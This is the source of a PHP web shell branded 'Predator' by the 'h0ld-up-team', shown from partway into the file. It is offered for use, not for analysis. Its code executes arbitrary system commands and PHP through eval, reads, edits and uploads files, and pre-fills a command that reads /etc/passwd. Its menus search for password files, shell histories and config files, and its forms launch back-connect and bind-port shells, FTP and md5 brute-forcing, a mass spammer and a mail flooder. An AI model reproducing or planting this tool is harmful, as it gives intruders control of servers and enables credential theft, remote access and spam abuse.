if(function_exists('exec'))
{
exec($in,$out);
$out = join("\n",$out);
}
elseif(function_exists('passthru'))
{
ob_start();
passthru($in);
$out = ob_get_contents();
ob_end_clean();
}
elseif(function_exists('system'))
{
ob_start();
system($in);
$out = ob_get_contents();
ob_end_clean();
}
elseif(function_exists('shell_exec'))
{
$out = shell_exec($in);
}
elseif(is_resource($f = popen($in,"r")))
{
$out = "";
while(!@feof($f)) { $out .= fread($f,1024); }
pclose($f);
}
return $out;
}
function shell()
{
if($_POST['type']==1)
{
eval(stripslashes($_POST['value']));
}
elseif($_POST['type']==2)
{
pwd();
print_r(ex(stripslashes($_POST['value'])));
}
elseif($_POST['type']==3)
{
if($_SESSION['safe_mode'] == 1){
if(($u=safe_ex('ls -la'))!='')
{return $u;}else{return safe_ex('dir');};
}else{
if(($u=ex('ls -la'))!='')
{return $u;}else{return ex('dir');};
}
}
elseif($_POST['type']==4)
{
if(file_exists(stripslashes($_POST['value'])))
{
if($safe_mode!=1){
echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value']))));
}else{
echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));
};
$_SESSION['edit']=1;
$_SESSION['filename'] = $_POST['value'];
}else{
return 'File doesn\'t exists!';
}
}
elseif($_POST['type']==5)
{
fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value']));
}
elseif($_POST['type']==6)
{
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
}
elseif($_POST['type']==7)
{
echo alias($_POST['value']);
}
elseif($_POST['type']==8)
{
echo spammer(stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['check']),stripslashes($_POST['elist']),stripslashes($_POST['logf']));
}
elseif($_POST['type']==9)
{
echo ftp_brute(stripslashes($_POST['host']),stripslashes($_POST['users']),stripslashes($_POST['passwd']),stripslashes($_POST['log']));
}
elseif($_POST['type']==10)
{
echo flooder(stripslashes($_POST['log']),stripslashes($_POST['to']),stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['amount']),stripslashes($_POST['check']));
}
elseif($_POST['type']==12)
{
echo backconnect(stripslashes($_POST['ip']),stripslashes($_POST['port']),stripslashes($_POST['method']));
}
elseif($_POST['type']==13)
{
echo backconnect(stripslashes($_POST['port']),stripslashes($_POST['pass']),stripslashes($_POST['method']));
}
elseif($_POST['type']==14)
{
echo md5_brute(stripslashes($_POST['hash']),stripslashes($_POST['log']),stripslashes($_POST['dict']));
}
else
{$u = ex('ls -la');
if($u == ''){return ex('dir');}else{return $u;};
}
return null;
};
function edit()
{
if ($_SESSION['edit'] == 1){
$_SESSION['edit']=0;
return "<br><center><input type=submit style=\"border:1px solid #666666;background:#333333;font-weight:bold;\" value=\"Save\"></center>";};
}
function getsystem()
{
return php_uname('s')." ".php_uname('r')." ".php_uname('v');
};
function getserver()
{
return getenv("SERVER_SOFTWARE");
};
function getuser()
{
$out = get_current_user();
if($out!="SYSTEM")
{
if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};
}
return $out;
};
function pwd()
{
if($_POST['type']==3)
{
$_SESSION['pwd'] = stripslashes($_POST['value']);
}
chdir($_SESSION['pwd']);
$cwd = getcwd();
if($u=strrpos($cwd,'/'))
{
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\\'))
{
if($u!=strlen($cwd)-1){
return $cwd.'\\';}
else{return $cwd;};
};
}
function safe_ex($in)
{
if($in){
$d=dir('.');
while (false!==($file=$d->read()))
{
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if(!$unix){
echo date("d.m.Y H:i",$mtime)." ";
if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
}
else{
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.Y H:i ",$mtime);
}
echo "$file\n";
}
$d->close();
}
function safe_read($in)
{
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwd");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
file_get_contents($in);
}
}
?>
<html>
<head>
<title>.::Predator::.</title>
<META http-equiv="Content-Type" content="text/html; charset=CP866">
<style type=text/css>
.ta {background: #333333; border:1px solid #666666; color: #FFFFFF;}
.bt {border: 1px solid #666666;background: #333333;font-weight:bold;}
.td1 {border:2px solid #000000;}
.td2 {border:1px solid #000000;}
.ram {border:1px solid #666666;background:#222222;}
body { scrollbar-base-color: #333333}
</style>
<script>
function kill()
{
var y;
y = confirm('Are you really want to kill shell?');
if(y == true)
{
document.location = '?kill=yes';
}
}
</script>
</head>
<body bgcolor='#000000'>
<center><table width=90% cellpadding=0 cellspacing=0 style="border: 1px solid #666666">
<tr><td width=100% height=70 bgcolor='#333333' style="border-bottom: 2px solid #666666" valign=top>
<table valign=top>
<tr><td valign=top>
<table valign=center class='ram'>
<tr><td width=5% align=right>
<font size=2 color=#888888>System:</font>
</td>
<td width=100%>
<font size=2 color=red><b><?php echo getsystem();?></b></font>
</td></tr>
<tr><td width=5% align=right>
<font size=2 color=#888888>Server:</font>
</td>
<td width=100%>
<font size=2 color=red><b><?php echo getserver();?></b></font>
</td></tr>
<tr><td width=5% align=right>
<font size=2 color=#888888>User:</font>
</td>
<td width=100%>
<font size=2 color=red><b><?php echo getuser();?></b></font>
</td></tr>
<tr><td width=5% align=right>
<font size=2 color=#888888>pwd:</font>
</td>
<td width=100%>
<font size=2 color=red><b><?php if(strlen($u=pwd())>45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?></b></font>
</td></tr>
</table>
</td>
<td width=13% valign=center align=center>
<table width=100% height=100% cellpadding=0 cellspacing=0><tr><td width=100% height=100%>
<center>
<a href="http://h0ld-up.info"><table cellpadding=2 cellspacing=2 style="border:1px solid #666666;background:#444444">
<tr><td><font size=2 color=#999999>
<center><b>.::h0ld-up-team::.<br>web-shell</b></center>
</font></td></tr></table></a></center>
</td></tr><tr><td height=5></td></tr><tr><td>
<center>
<input type=submit style="border:1px solid #666666;background: darkred;font-weight:bold;" value=' Kill Shell ' onclick='kill()'>
</center>
</td></tr></table>
</td>
<td class='ram' width=45% valign=center align=center>
<table cellpadding=0 cellspacing=0>
<tr><td>
<table valign=top cellpadding=0 cellspacing=0>
<tr><td align=right>
<font size=2 color='#888888'>PHP-version:</font>
</td></tr>
<tr><td align=right>
<font size=2 color='#888888'>MySQL:</font>
</td></tr>
<tr><td align=right>
<font size=2 color='#888888'>MSSQL:</font>
</td></tr>
<tr><td align=right>
<font size=2 color='#888888'>PostgreSQL:</font>
</td></tr>
<tr><td align=right>
<font size=2 color='#888888'>Oracle:</font>
</td></tr>
</table>
</td><td>
<table valign=top cellpadding=0 cellspacing=0>
<tr><td>
<b><font size=2 color=red><?php echo phpversion();?></font></b>
</td></tr>
<tr><td>
<b><?php echo testmysql();?></b>
</td></tr>
<tr><td>
<b><?php echo testmssql();?></b>
</td></tr>
<tr><td>
<b><?php echo postgresql();?></b>
</td></tr>
<tr><td>
<b><?php echo oracle();?></b>
</td></tr>
</table>
</td><td width=4%></td>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<tr><td valign=top align=right>
<font color=#888888 size=2>Safe_mode:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>cURL:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>wget:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>fetch:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>lynx:</font>
</td></tr>
</table></td>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<tr><td valign=top>
<b><?php echo safe_mode();?></b>
</td></tr>
<tr><td valign=top>
<b><?php echo testcurl();?></b>
</td></tr>
<tr><td valign=top>
<b><?php echo testwget();?></b>
</td></tr>
<tr><td valign=top>
<b><?php echo testfetch();?></b>
</td></tr>
<tr><td valign=top>
<b><?php echo testlynx();?></b>
</td></tr>
</table></td>
<td width=4%></td>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<tr><td valign=top align=right>
<font color=#888888 size=2>Perl:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>Server time:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>Server date:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>Total space:</font>
</td></tr>
<tr><td valign=top align=right>
<font color=#888888 size=2>Free space:</font>
</td></tr>
</table></td>
<td valign=top><table cellpadding=0 cellspacing=0 valign=top>
<tr><td valign=top>
<b><font size=2 color=green><?php echo testperl();?></font></b>
</td></tr>
<tr><td valign=top>
<b><font size=2 color=#999999><?php echo date('H:i');?></font></b>
</td></tr>
<tr><td valign=top>
<b><font size=2 color=#999999><?php echo date('d-m-Y');?></font></b>
</td></tr>
<tr><td valign=top>
<b><font size=2 color=#999999><?php echo view_size(disk_total_space(getcwd()));?></font></b>
</td></tr>
<tr><td valign=top>
<b><font size=2 color=#999999><?php echo view_size(diskfreespace(getcwd()));?></font></b>
</td></tr>
</table></td></tr>
</table>
</td></tr>
</table>
</td></tr>
<tr><td width=100% height=100% bgcolor='#333333' valign=top>
<table width=100%>
<tr><td valign=top align=center>
<table width=100% height=200 class='td1'>
<tr><td valign=top align=left width=50%>
<form action method=POST>
<input type=hidden name="type" value=5>
<textarea cols=80 rows=13 name="value" class='ta'>
<?php echo htmlspecialchars(shell());?>
</textarea><?php echo edit();?></form>
</td>
<td valign=top align=left width=10%>
<table width=100% height=100% class='td2'>
<form action method=POST><tr><td valign=top align=left height=40% style="border-bottom: 1px solid #000000;">
<b>.::System shell::.</b><br>
<input type=hidden name="type" value=2>
<center><input type=text name="value" size=35 class='ta'></center>
</ br><center><input type=submit value="Enter" style="border-top: 1px solid #333333;border-bottom: 1px solid #666666;border-right: 1px solid #666666;border-left: 1px solid #666666;background: #333333;font-weight:bold;"></center>
</td></tr></form>
<tr><td valign=top align=left>
<form action method=POST>
<table>
<tr><td>
<b>.::PHP-code::.</b>
</td><td align=right>
<input type=submit value="Run code" class='bt'>
<input type=hidden name="type" value=1>
</td></tr>
<tr><td colspan=2>
<textarea rows=5 cols=26 name="value" class='ta'><?php echo "readfile('/etc/passwd');";?></textarea>
</td></tr>
</table></form>
</td></tr>
</table>
</td></tr>
</table>
<table>
<tr><td height=0></td></tr>
</table>
<table width=100% height=80 class='td1' valign=top>
<tr><td valign=top align=left width=50%>
<form action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td>
<b>.::PWD::.</b>
</td><td align=right>
<input type=submit class='bt' value="cd">
<input type=hidden name="type" value=3>
</td></tr>
<tr><td colspan=2>
<input type=text name="value" class='ta' size=71 value=<?php echo pwd();?>>
</td></tr>
</table></form></td><td valign=top align=left width=50%>
<form action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td>
<b>.::File Edit::.</b>
</td><td align=right>
<input type=submit class='bt' value="Edit">
<input type=hidden name="type" value=4>
</td></tr>
<tr><td colspan=2>
<input type=text name="value" class='ta' size=72 value=<?php echo pwd();?>>
</td></tr>
</table></form>
</td></tr>
<tr><td valign=top align=left width=50%>
<form action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td>
<b>.::Download::.</b>
</td><td align=right>
<input type=submit class='bt' value="Download">
<input type=hidden name="type" value=11>
</td></tr>
<tr><td colspan=2>
<input type=text name="value" class='ta' size=71 value=<?php echo pwd();?>>
</td></tr>
</table></form></td><td valign=top align=left width=50%>
<form enctype="multipart/form-data" action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td>
<b>.::Upload::.</b>
</td><td align=right colspan=3>
<input type=submit class='bt' value="Upload">
<input type=hidden name="type" value=6>
</td></tr>
<tr><td colspan=2>
<font size=2 color=#888888>New name:</b>
<input type=text size=15 name="newname" class=ta>
</td><td width=4></td><td colspan=2>
<input type=file name="userfile" size=28>
</td></tr>
</table></form>
<tr><td valign=top align=left width=50%>
<form action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td>
<b>.::Alias::.</b>
</td><td align=right>
<input type=submit class='bt' value="RUN">
<input type=hidden name="type" value=7>
</td></tr>
<tr><td colspan=2>
<select name='value' class='ta' width=200>
<option>find apahce config file</option>
<option>find access_log files</option>
<option>find error_log files</option>
<option>find suid files</option>
<option>find suid files in current dir</option>
<option>find sgid files</option>
<option>find sgid files in current dir</option>
<option>find config.inc.php files</option>
<option>find config.inc.php files in current dir</option>
<option>find config* files</option>
<option>find config* files in current dir</option>
<option>find all writable files</option>
<option>find all writable files in current dir</option>
<option>find all writable directories</option>
<option>find all writable directories in current dir</option>
<option>find all writable directories and files</option>
<option>find all writable directories and files in current dir</option>
<option>find all service.pwd files</option>
<option>find service.pwd files in current dir</option>
<option>find all .htpasswd files</option>
<option>find .htpasswd files in current dir</option>
<option>find all .bash_history files</option>
<option>find .bash_history files in current dir</option>
<option>find all .mysql_history files</option>
<option>find .mysql_history files in current dir</option>
<option>find all .fetchmailrc files</option>
<option>find .fetchmailrc files in current dir</option>
<option>list file attributes on a Linux second extended file system</option>
<option>show opened ports</option>
<option>---------------------------------------------------------------------------------------------------------</option>
</select>
</td></tr>
</table></form></td>
<script>
function base64Encode(str)
{
var charBase64 = new Array(
'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
);
var out = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
var len = str.length;
do
{
chr1 = str.charCodeAt(i++);
chr2 = str.charCodeAt(i++);
chr3 = str.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 & 0x03) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 0x0F) << 2) | (chr3 >> 6);
enc4 = chr3 & 0x3F;
out += charBase64[enc1] + charBase64[enc2];
if (isNaN(chr2))
{
out += '==';
}
else if (isNaN(chr3))
{
out += charBase64[enc3] + '=';
}
else
{
out += charBase64[enc3] + charBase64[enc4];
}
}
while (i < len);
return out;
}
function base64Decode(str)
{
var indexBase64 = new Array(
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,62, -1,-1,-1,63,
52,53,54,55, 56,57,58,59, 60,61,-1,-1, -1,-1,-1,-1,
-1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10, 11,12,13,14,
15,16,17,18, 19,20,21,22, 23,24,25,-1, -1,-1,-1,-1,
-1,26,27,28, 29,30,31,32, 33,34,35,36, 37,38,39,40,
41,42,43,44, 45,46,47,48, 49,50,51,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1,
-1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1, -1,-1,-1,-1
);
var out = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
str = str.replace(/^[^a-zA-Z0-9\+\/\=]+|[^a-zA-Z0-9\+\/\=]+$/g,"")
var len = str.length;
do
{
enc1 = indexBase64[str.charCodeAt(i++)];
enc2 = indexBase64[str.charCodeAt(i++)];
enc3 = indexBase64[str.charCodeAt(i++)];
enc4 = indexBase64[str.charCodeAt(i++)];
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
out += String.fromCharCode(chr1);
if (enc3 != -1)
{
out += String.fromCharCode(chr2);
}
if (enc4 != -1)
{
out += String.fromCharCode(chr3);
}
}
while (i < len);
if (i != len)
{
new Error(BASE64_BROKEN);
return "";
}
return out;
}
</script>
<td valign=top align=left width=50%>
<form action method=POST>
<table width=100% height=100% valign=top class='td2'>
<tr><td width=1%>
<b>.::Base64_encode::.</b>
</td><td align=right width=6%>
<input type=button value="encode" class='bt' onclick='t.value=base64Encode(t.value)'>
</td>
<form action method=POST><td width=1%>
<b>.::Base64_decode::.</b>
</td><td align=right width=6%>
<input type=button value="decode" class='bt' onclick='n.value=base64Decode(n.value)'>
</td></tr>
<tr><td colspan=2>
<input type=text name='t' class='ta' size=34>
</td><td colspan=2>
<input type=text name='n' class='ta' size=34>
</td></tr>
</table></form>
</td></tr>
</td></tr>
</table>
</td></tr><tr></tr><tr><td>
<table cellpadding=0 cellspacing=0><tr><td>
<table class='td1' width=226>
<tr><td width=100% class='td2'>
<form action method=POST>
<table cellpadding=0 cellspacing=0 width=90% border=0><tr><td colspan=3>
<b>.::Back Connect::.</b></td></tr>
<tr><td width=100% height=10 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2><b>IP:</b></font></td>
<td width=5%></td>
<td width=100% align=right>
<input type=text class='ta' name='ip' size=15 value=<?php echo $_SERVER['REMOTE_ADDR'];?>></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2>port:</font></td>
<td width=5%></td>
<td width=100% align=right>
<input type=text class='ta' name='port' size=10 value='5000'></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2>Method:</font></td>
<td width=5%></td>
<td width=100% align=right>
<select class='ta' name='method'>
<option>Perl</option>
<option>C#</option>
<option>---------------------</option>
</select></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=100% align=right colspan=3>
<input type=hidden name='type' value='12'>
<input type=submit value='Connect' class='bt'></form>
<tr><td width=100% height=5 colspan=3></td></tr>
</table>
</td></tr>
</table>
</td><td width=5></td><td>
<table class='td1' width=226>
<tr><td width=100% class='td2'>
<form action method=POST>
<table cellpadding=0 cellspacing=0 width=90% border=0><tr><td colspan=3>
<b>.::Bind port::.</b></td></tr>
<tr><td width=100% height=10 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2><b>Port:</b></font></td>
<td width=5%></td>
<td width=100% align=right>
<input type=text class='ta' name='port' size=15 value='6000'></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2>pass:</font></td>
<td width=5%></td>
<td width=100% align=right>
<input type=text class='ta' name='pass' size=10 value='hshell'></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=25% align=right><font color=#888888 size=2>Method:</font></td>
<td width=5%></td>
<td width=100% align=right>
<select class='ta' name='method'>
<option>Perl</option>
<option>C#</option>
<option>---------------------</option>
</select></td></tr>
<tr><td width=100% height=5 colspan=3></td></tr>
<tr><td width=100% align=right colspan=3>
<input type=hidden name='type' value='12'>
<input type=submit value='Bind' class='bt'></form>
<tr><td width=100% height=5 colspan=3></td></tr>
</table>
</td></tr>
</table>
</td><td width=5></td><td width=50% height=141>
<table class='td1' width=100% height=100% valign=top><tr><td width=100% height=100% class='td2' valign=top>
<table cellpadding=0 cellspacing=0 width=95%><tr><td colspan=4>
<b>.::md5 bruter::.</b>
</td></tr><tr><td height=10></td></tr>
<tr><td width=20></td><td>
<font size=2 color="#888888" align=right><b>hash:</b></font></td><td width=5></td><td align=right>
<input type=text name='hash' class='ta' size=50>
</td></tr>
<tr><td height=5></td>
<tr><td width=20></td><td>
<font size=2 color="#888888" align=right>log_file:</font></td><td width=5></td><td align=right>
<input type=text name='log' class='ta' size=30 value='md5_log.txt'>
</td></tr>
<tr><td height=5></td>
<tr><td width=20></td><td>
<font size=2 color="#888888" align=right>dictionary_file:</font></td><td width=5></td><td align=right>
<input type=text name='dict' class='ta' size=30 value='md5_dict.txt'>
</td></tr>
<tr><td height=5></td>
<tr><td width=20></td><td>
</td><td width=5></td><td align=right>
<input type=submit class='bt' value='Start Brute'>
</td></tr>
</table>
</td></tr></table>
</td></tr></table>
<tr></tr><tr><td>
<table class='td1' width=100% height=310 valign=top align=left>
<form action method=POST>
<td valign=top align=left class='td2' width=33%>
<table cellpadding=0 cellspacing=0 width=100%>
<tr><td valign=top colspan=3 height=30>
<b>.::Spammer::.</b>
<tr><td width=25% align=right>
<font color=#888888 size=2><b>emails_file:</b></font>
</td><td width=65% align=right>
<input type=text name='elist' class='ta' size=17 value="emails.txt">
</td></tr><tr><td height=5></td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2><b>log_file:</b></font>
</td><td width=65% align=right>
<input type=text name='log' class='ta' size=17 value="mail_log.txt">
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>From:</font>
</td><td width=65% align=right>
<input type=text name='from' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Subject:</font>
</td><td width=65% align=right>
<input type=text name='subject' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Message:</font>
</td><td width=65% align=right>
<textarea name='msg' class='ta' cols=20 rows=4></textarea>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Check<sup>*</sup>:</font>
</td><td width=65% align=right>
<input type=text name='check' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
</td><td width=65% align=right>
<input type=submit class='bt' value="Start">
<input type=hidden name='type' value=10>
</td></tr>
</table></form>
<form action method=POST>
<td valign=top align=left class='td2' width=33%>
<table cellpadding=0 cellspacing=0 width=100%>
<tr><td colspan=3 height=30 valign=top><b>.::FTP-Brute::.</b></td></tr>
<tr><td width=31% align=right>
<font color=#888888 size=2><b>Host:</b></font>
</td><td align=right>
<input type=text name='host' class='ta' size=28>
</td><td width=5%></td></tr><tr><td height=35 width=100% colspan=2></td></tr>
<tr><td align=right>
<font color=#888888 size=2>ftp_users file:</font>
</td><td align=right>
<input type=text name='users' class='ta' size=17 value="ftp_users.txt">
</td><td></td></tr>
<tr><td height=5 width=100% colspan=2></td></tr>
<tr><td align=right>
<font color=#888888 size=2>ftp_passwd file:</font>
</td><td align=right>
<input type=text name='passwd' class='ta' size=17 value="ftp_passwds.txt">
</td><td></td></tr>
<tr><td height=5 width=100% colspan=2></td></tr>
<tr><td align=right>
<font color=#888888 size=2>ftp_log file:</font>
</td><td align=right>
<input type=text name='log' class='ta' size=17 value="ftp_log.txt">
</td><td></td></tr>
<tr><td colspan=2 height=20></td></tr>
<tr><td colspan=2 align=right>
<input type=submit class='bt' value="Start Brute">
<input type=hidden name="type" value=9>
</td></tr>
</td></table></form>
<form action method=POST>
<td valign=top align=left class='td2' width=33%>
<table cellpadding=0 cellspacing=0 width=100%>
<tr><td valign=top colspan=3 height=30>
<b>.::Flooder::.</b>
<tr><td width=25% align=right>
<font color=#888888 size=2><b>log_file:</b></font>
</td><td width=65% align=right>
<input type=text name='log' class='ta' size=17 value="mflood_log.txt">
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Send to:</font>
</td><td width=65% align=right>
<input type=text name='to' class='ta' size=27>
</td></tr><tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>From:</font>
</td><td width=65% align=right>
<input type=text name='from' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Subject:</font>
</td><td width=65% align=right>
<input type=text name='subject' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Message:</font>
</td><td width=65% align=right>
<textarea name='msg' class='ta' cols=20 rows=4></textarea>
</td></tr>
<td height=25><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Amount:</font>
</td><td width=65% align=right>
<input type=text name='amount' class='ta' size=17>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
<font color=#888888 size=2>Check<sup>*</sup>:</font>
</td><td width=65% align=right>
<input type=text name='check' class='ta' size=27>
</td></tr>
<td height=5><td></tr>
<tr><td width=25% align=right>
</td><td width=65% align=right>
<input type=submit class='bt' value="Flood">
<input type=hidden name='type' value=10>
</td></tr>
</table></form>
</td></tr>
</table>
</td></tr>
</table>
</td></tr>
</table></center>
<center><font size=1 color=#444444>.:[Public v1.0]:.</font></center>
</body>
</html>
<!-- Coded by LoFFi & Ls01r //-->